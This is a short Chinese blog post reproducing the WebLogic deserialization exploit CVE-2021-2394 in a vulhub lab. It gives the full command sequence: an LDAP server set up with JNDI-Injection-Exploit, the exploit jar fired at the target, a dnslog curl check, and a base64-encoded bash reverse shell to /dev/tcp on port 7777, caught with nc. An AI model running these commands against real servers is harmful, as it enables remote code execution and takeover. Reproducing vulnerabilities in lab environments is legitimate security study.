WebLogic反序列化漏洞(CVE_2021_2394)

  • Post author:
  • Post category:其他


漏洞利用简介:通过FilterExtractor类反序列化漏洞利用导致命令执行


本次利用vulhub靶场的/weblogic/CVE-2020-14882靶机复现

攻击机环境与工具:jdk1.8,JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar,CVE_2021_2394.jar

在这里插入图片描述

http://dnslog.cn/

在dnslog.cn点击get subdomain,得到url urjxbx.dnslog.cn

在这里插入图片描述

使用工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "curl urjxbx.dnslog.cn" -A 192.168.217.130
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C [执行的命令] -A [开启ldap服务的vps]

在这里插入图片描述

选择一个生成的idap服务

java -jar CVE_2021_2394.jar 192.168.217.130 7001 ldap://192.168.217.130:1389/dftzgt
java -jar CVE_2021_2394.jar [被攻击者IP] [端口] [生成的ldap服务,jdk7\jdk8都可以]

在这里插入图片描述

可以看到DNSlog接收到了靶机的请求,证明我们可以利用靶机执行curl命令操作,尝试用bush -i 反弹shell

反弹shell时命令需要进行base64编码

http://www.jackson-t.ca/runtime-exec-payloads.html

bash -i >& /dev/tcp/192.168.217.130/7777 0>&1

在这里插入图片描述

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxNy4xMzAvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}" -A 192.168.217.130

在这里插入图片描述

成功用nc 监听到反弹的shell

在这里插入图片描述



版权声明:本文为m0_51330619原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。